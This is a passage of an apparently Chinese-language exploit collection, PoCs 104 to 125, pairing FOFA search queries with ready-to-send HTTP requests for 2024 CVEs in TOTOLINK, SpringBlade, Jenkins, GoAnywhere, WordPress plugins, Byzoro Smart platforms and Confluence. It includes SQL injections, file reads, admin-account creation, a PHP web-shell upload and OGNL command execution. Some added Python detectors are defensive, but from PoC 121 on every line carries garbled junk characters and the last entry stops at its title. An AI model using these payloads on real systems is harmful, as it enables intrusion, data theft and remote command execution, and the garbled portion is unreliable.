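    kinds = re.findall(r"<!(DOCTYPE|ENTITY)\b", xml)
    urls = re.findall(r'\bSYSTEM\s+"([^"]+)"', xml)
    return kinds, urls


def find_external_retrieval(xml: str, own_hosts=OWN_HOSTS):
    """URIs on ds:RetrievalMethod / ds:Reference that point at a host we do not own;
    same-document references (#id) have no host and are ignored."""
    hits = []
    for uri in re.findall(r'<ds:(?:RetrievalMethod|Reference)\b[^>]*\bURI="([^"]+)"', xml):
        host = urlparse(uri).hostname
        if host and host not in own_hosts:
            hits.append(uri)
    return hits


def inspect_saml_request(value: str) -> dict:
    """One verdict dict per SAMLRequest value, suitable for a proxy or log hook."""
    xml = decode_saml_request(value)
    kinds, urls = find_dtd(xml)
    return {"dtd": kinds, "external_dtd_urls": urls,
            "external_retrieval": find_external_retrieval(xml)}
```

For PoC 103 the verdict lists the DOCTYPE and ENTITY declarations plus the dnslog URL; for PoC 102 find_external_retrieval returns the RetrievalMethod URI, while the benign AuthnRequest in either binding returns empty lists.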

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
The request is accepted with an empty token:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
The URL as published is truncated; the injection sits in the query string of the export-user endpoint and uses the same error-based updatexml primitive as PoCs 106 and 107:
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
The injection is in the parameter name, not its value: the list endpoint turns unknown query parameters into SQL conditions, so the MySQL version is returned in the error text.

GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
The web-upload handler fetches the url parameter server-side, so a DNS or HTTP hit on the dnslog host confirms it.

GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
The CLI endpoint is driven by a pair of requests sharing one Session id: the "upload" side carries the framed command, the "download" side returns its output. The body below is written as a Python bytes literal; send the raw bytes (57 of them, so Content-Length must be the byte count, not the length of the literal). Each frame is a 4-byte big-endian length, a 1-byte opcode (0 = argument, 1 = locale, 2 = encoding, 3 = start) and a 2-byte-length-prefixed string; args4j expands the @/etc/passwd argument into the file's contents before the help command runs.

POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


The download side returns the help text, with lines of /etc/passwd surfacing in the error and default-value fields:

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

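Added example (not code from the original post or from the Jenkins project): a Python parser for the framed CLI body above, the kind of thing a reverse proxy or WAF hook needs in order to reject uploads whose arguments start with "@". The frame layout and the opcode values 0 to 3 are the ones the PoC bytes follow; other opcodes are reported by number. PAGE_BODY is the PoC body as raw bytes.

```python
import struct

# Opcodes confirmed by the frames in the PoC above; anything else is reported as OP<n>.
OPS = {0: "ARG", 1: "LOCALE", 2: "ENCODING", 3: "START"}

# The PoC body as raw bytes (the page shows it as a Python literal).
PAGE_BODY = (b"\x00\x00\x00\x06\x00\x00\x04help"
             b"\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd"
             b"\x00\x00\x00\x05\x02\x00\x03GBK"
             b"\x00\x00\x00\x07\x01\x00\x05en_US"
             b"\x00\x00\x00\x00\x03")


def parse_frames(body: bytes):
    """Split a CLI upload body into (opcode name, payload) frames.
    Frame layout: 4-byte big-endian payload length, 1-byte opcode, payload."""
    frames, pos = [], 0
    while pos < len(body):
        if pos + 5 > len(body):
            raise ValueError(f"truncated frame header at offset {pos}")
        (length,) = struct.unpack(">I", body[pos:pos + 4])
        op = body[pos + 4]
        payload = body[pos + 5:pos + 5 + length]
        if len(payload) != length:
            raise ValueError(f"truncated frame payload at offset {pos}")
        frames.append((OPS.get(op, f"OP{op}"), payload))
        pos += 5 + length
    return frames


def read_utf(payload: bytes) -> str:
    """String payloads use Java's DataOutputStream.writeUTF layout: 2-byte length + bytes."""
    (n,) = struct.unpack(">H", payload[:2])
    if len(payload) != 2 + n:
        raise ValueError("string length does not match payload")
    return payload[2:2 + n].decode("utf-8")


def cli_args(body: bytes):
    """The command line the CLI will run, in order."""
    return [read_utf(p) for op, p in parse_frames(body) if op == "ARG"]


def file_expansion_args(body: bytes):
    """Arguments args4j would expand from a file before the command even runs;
    this is the CVE-2024-23897 trigger, so a proxy can reject the upload on it."""
    return [a for a in cli_args(body) if a.startswith("@")]


def raw_length(body: bytes) -> int:
    """Content-Length the upload side must carry: the byte count, not the literal's length."""
    return len(body)


if __name__ == "__main__":
    for op, payload in parse_frames(PAGE_BODY):
        print(op, read_utf(payload) if payload else "")
    print("args:", cli_args(PAGE_BODY), "file expansions:", file_expansion_args(PAGE_BODY))
```

On the PoC body the parser yields the arguments help and @/etc/passwd, the encoding GBK and the locale en_US, followed by the START frame; a body cut short raises ValueError instead of silently returning partial frames.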
110. GoAnywhere MFT unauthenticated administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
The ..;/ segment lets the request reach the first-run InitialAccountSetup wizard through the unauthenticated /images/ path, where a new administrator account can be created.

GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
Time-based: the response is delayed by about 6 seconds when the id parameter is injectable.

GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
The injection is in the type field of the JSON body (a 5 second delay on success):

POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
The link parameter is fetched server-side and returned, so a file:// URL reads local files and an http:// URL turns it into SSRF.

GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
Time-based, in the user parameter (5 second delay on success):

GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: fetch the front page and take the nonce from its source (search the response for "nonce").
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: put that nonce into the request below and execute the command. The queryEditor string is evaluated as PHP on the server; the PoC captures the output of id and throws it as an exception so it comes back in the response.
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
The request goes through /wp-admin/, so it needs a logged-in session cookie. {{rand8}} is a template placeholder for a random 8-character file name; the PoC as published sends an empty file body.

POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
Affected versions: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
Time-based, through the id[where] array key (5 second delay on success):

GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


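Added example for PoCs 105 to 107 and 111 to 117 (not code from the original post): a Python scanner that runs the endpoint fingerprints and the time-based and error-based SQL primitives from those PoCs over web-server access-log lines in combined format. The log lines are constructed here from the PoC URLs with documentation-range addresses. Injections that travel only in the request body, such as the NotificationX JSON in PoC 112, can be matched on the endpoint alone because the access log does not record bodies.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Endpoint fingerprints taken from the PoCs above; matched against the decoded path+query.
KNOWN_ENDPOINTS = [
    ("SpringBlade blade-system list SQLi (PoC 106/107)",
     re.compile(r"/api/blade-system/(?:dict-biz|tenant)/list")),
    ("WordPress HTML5 Video Player SQLi (CVE-2024-1061)",
     re.compile(r"rest_route=/h5vp/v1/view/")),
    ("WordPress NotificationX SQLi (CVE-2024-1698)",
     re.compile(r"/wp-json/notificationx/v1/analytics")),
    ("WordPress MasterStudy LMS SQLi (PoC 114)",
     re.compile(r"rest_route=/lms/stm-lms/order/items")),
    ("WordPress LayerSlider SQLi (PoC 117)",
     re.compile(r"admin-ajax\.php\?action=ls_get_popup_markup")),
]
# MySQL primitives the PoCs rely on for time-based and error-based extraction.
SQLI_PRIMITIVES = re.compile(r"\b(sleep|updatexml|extractvalue|benchmark)\s*\(", re.I)
# Apache/nginx combined log format: ip ident user [ts] "METHOD uri proto" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')

# Constructed log lines built from the PoC URLs (203.0.113.0/24 and 198.51.100.0/24
# are documentation ranges, not real hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2024:10:00:01 +0000] "GET /?rest_route=/h5vp/v1/view/1&id=1\'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2024:10:00:02 +0000] "GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1" 500 98 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [12/Mar/2024:10:00:03 +0000] "GET /wp-json/wp/v2/posts?per_page=5 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2024:10:00:04 +0000] "POST /wp-json/notificationx/v1/analytics HTTP/1.1" 200 40 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2024:10:00:05 +0000] "GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Mar/2024:10:00:06 +0000] "GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1" 200 2 "-" "Mozilla/5.0"',
]


def classify(uri: str):
    """Decode the URI once (so %28 and + do not hide anything), then match."""
    decoded = unquote_plus(uri)
    endpoints = [name for name, rx in KNOWN_ENDPOINTS if rx.search(decoded)]
    primitives = sorted({m.lower() for m in SQLI_PRIMITIVES.findall(decoded)})
    return endpoints, primitives


def scan(lines):
    """One hit dict per log line that matches a known endpoint or a SQL primitive."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        endpoints, primitives = classify(m["uri"])
        if endpoints or primitives:
            hits.append({"ip": m["ip"], "method": m["method"], "uri": m["uri"],
                         "endpoints": endpoints, "sqli": primitives})
    return hits


def by_source(hits):
    """Hit count per client address, to spot one scanner sweeping every PoC."""
    return Counter(h["ip"] for h in hits)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for h in found:
        print(h["ip"], h["method"], h["endpoints"], h["sqli"])
    print(by_source(found))
```

On the sample, five of the six lines are flagged: four carry a sleep or updatexml primitive, the NotificationX POST matches on the endpoint only, and the plain wp/v2/posts request is ignored; by_source attributes all five to the same scanner address.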
118. Byzoro (北京百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


The txt_path field sets the destination, so the upload lands at /home/src.php; request that path and pass commands in the passwd POST parameter.

119. Byzoro (北京百绰) Smart S20 management platform sysmanageajax.php authenticated SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin. The id field is time-based: the response is delayed by 5 seconds when the database name is 3 characters long.

POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://x.x.x.x:8443
Referer: https://x.x.x.x:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Byzoro (北京百绰) Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


The file is written to /upload/2.php.

121. 北京百绰智能S42管理平台userattestation.php任意文件上传" L0 D# U! c0 r; k+ {, R. S
CVE-2024-1918
3 w; M( Y3 x* l1 }3 Z  hFOFA:title="Smart管理平台"
, v+ H6 R# c5 x$ {1 O, [$ aPOST /useratte/userattestation.php HTTP/1.1
! p: [: }2 \  u# l4 L  s9 q6 BHost: 192.168.40.130:8443' {8 W2 i' c; q( o* d) T5 f
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
7 u2 Q+ }) [0 J' T! e" N8 dUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko2 \& i/ q% o# q  |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 ^) k! M$ w, |5 o$ L0 x6 ~# I4 LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' i9 d1 `; p; K' q0 n* Y; h9 U
Accept-Encoding: gzip, deflate
* e  F3 s: @1 f, `' \/ A; j3 q6 f1 _Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
9 ~5 X+ U; V" L( [* y; g- tContent-Length: 592
  m+ }2 G; r0 v5 A) ~4 qOrigin: https://192.168.40.130:8443
9 V0 p6 F0 B' r; _Upgrade-Insecure-Requests: 1
' h% a, j7 d' C7 S0 T- X: h  k6 K5 ISec-Fetch-Dest: document
8 q! R( {, S6 M8 D: c/ z2 RSec-Fetch-Mode: navigate
  Z& G. M- }$ }- w! hSec-Fetch-Site: same-origin: a8 V6 P0 i) h' X. X, S
Sec-Fetch-User: ?1. x! l$ i2 }6 [. ^. h  }
Te: trailers& w% w& ]8 t. t# K
Connection: close
! I; E1 j0 G5 a8 i5 w9 H# t2 T7 o  I: Y; K5 y
-----------------------------42328904123665875270630079328
. I% I5 h4 L+ n' |Content-Disposition: form-data; name="web_img"; filename="1.php"
' f% T8 }7 }. UContent-Type: application/octet-stream* K' `) |' }& {

$ C! v, H5 _! Y$ \<?php phpinfo();?>
. I1 b0 @/ |2 G, Z3 g-----------------------------42328904123665875270630079328
$ k; O1 T) D  ]# LContent-Disposition: form-data; name="id_type"9 s# Q; B9 K7 g* X) e1 h# D
- c4 s) @# B$ ~1 A  }6 _. [+ V
1! E5 j- p3 I+ u8 @+ x2 l" X
-----------------------------423289041236658752706300793283 v% B& f* R: I
Content-Disposition: form-data; name="1_ck"
+ Q  N8 ]" U# k  H( j. S5 A! `4 J5 T, w7 k( i5 I" t' y
1_radhttp/ K5 U7 h1 l! ]" g  t5 Z
-----------------------------42328904123665875270630079328
$ {5 _2 S% R4 N6 N7 \; jContent-Disposition: form-data; name="hidwel"$ \/ Z9 r" W0 d$ P1 m" `9 K  E
& g8 |( T8 q: b% C# P# `& ~  Q% f+ f
set/ b5 r7 m" x9 ^4 x+ ^" G
-----------------------------42328904123665875270630079328
/ x: N; l( M& V$ `
  ~5 V' g! H' R# ]9 C
+ a' O# ^" [1 {- O: o; v$ bboot/web/upload/weblogo/1.php2 s( t7 v) w" f' m$ |

$ \1 F$ ^7 A' ^8 p* [4 q122. 北京百绰智能s200管理平台/importexport.php sql注入
* u- h8 t. ]* F: eCVE-2024-27718FOFA:title="Smart管理平台"
2 B' l0 P- A9 o7 T1 {其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
" V8 }8 Z% H2 m8 n( zGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
0 b- a" m1 l/ _: l" iHost: x.x.x.x" F- c# V' i8 S
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0$ C( A. T* V8 w  W6 @4 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
+ U2 ?9 O- {; [/ v! wAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! S7 B( u* {. D. r. J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 k* d# U, x$ Y. F5 @- x
Accept-Encoding: gzip, deflate, br
1 s" O9 P* M' r9 N, R" ~6 DUpgrade-Insecure-Requests: 1
; B1 m8 ?( V: F# {9 y( x! vSec-Fetch-Dest: document- \1 H- T' t7 K$ R  M4 v- I
Sec-Fetch-Mode: navigate
. y! s) I' q5 ?0 C9 y  ^" g( XSec-Fetch-Site: none
% R0 V) C% P' {& H# U6 ASec-Fetch-User: ?1
+ B( H2 [4 y' z/ ?/ \: A7 v% \8 eTe: trailers
( n- R5 J+ |+ g: [' z0 f% d4 I- N, VConnection: close# L) O# x* F; \. p: E

7 Q* K# s: i5 E; `  G) x
, d! U! I6 V" n( ?5 `: ^" o3 E123. Atlassian Confluence 模板注入代码执行- H) `' J2 x% C# B( t) R
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
3 b, M* N# V( x3 B/ x5 O" \0 `POST /template/aui/text-inline.vm HTTP/1.1
$ V1 V8 r$ x0 W1 p! t: VHost: localhost:8090
7 m9 H0 X/ q7 U; x1 }Accept-Encoding: gzip, deflate, br+ Q* v5 T( n% \+ \& V
Accept: */*  |1 {1 G+ ?; O, y/ a# g
Accept-Language: en-US;q=0.9,en;q=0.8
# s  V" ^- B0 M+ \# Z# GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36+ n- y$ ?5 g) t0 ~% S+ J2 J9 b4 }
Connection: close
( C  r6 C* v4 [+ MContent-Type: application/x-www-form-urlencoded
. a0 Q  B) a  W9 `8 R8 d0 E4 R0 M, J# `$ q- e6 S
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
" i5 H  C1 Z2 S
0 C4 {# j, q6 k( V& `% t5 O9 O' g7 r0 L" d
124. 湖南建研工程质量检测系统任意文件上传* U& D3 C4 D4 e6 o0 f* f# t7 A/ g7 X
FOFA:body="/Content/Theme/Standard/webSite/login.css"
2 h" P3 m4 n0 q2 FPOST /Scripts/admintool?type=updatefile HTTP/1.1' T4 f, ~/ R- M
Host: 192.168.40.130:8282
8 \- j- R% n4 G$ _  b' S" d. p2 X6 EUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
$ h% [* R: T) r$ [. q9 ?Content-Length: 726 p/ u) c; Y" q/ L  v  ^0 y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8, \; x, p4 h& {# B, t9 v. {
Accept-Encoding: gzip, deflate, br6 q  v$ X8 U1 j( J# d
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; S6 p% X% m& P3 VConnection: close
" C! B' n' Q; N$ gContent-Type: application/x-www-form-urlencoded1 y; ^: k, D! m- \, K

0 u1 h3 g8 _7 w2 A0 l2 j# sfilePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
" J: z+ |3 m. W( |9 \5 |6 U8 L# @7 f$ y- Z$ K* y+ t1 \

0 s' R+ x+ O, W2 V* Khttp://192.168.40.130:8282/Scripts/abcgcg.aspx% F9 t$ x/ u- G) Y  p' w6 D! ^( ?

1 K- ~8 I& @' R7 ~125. ConnectWise ScreenConnect身份验证绕过
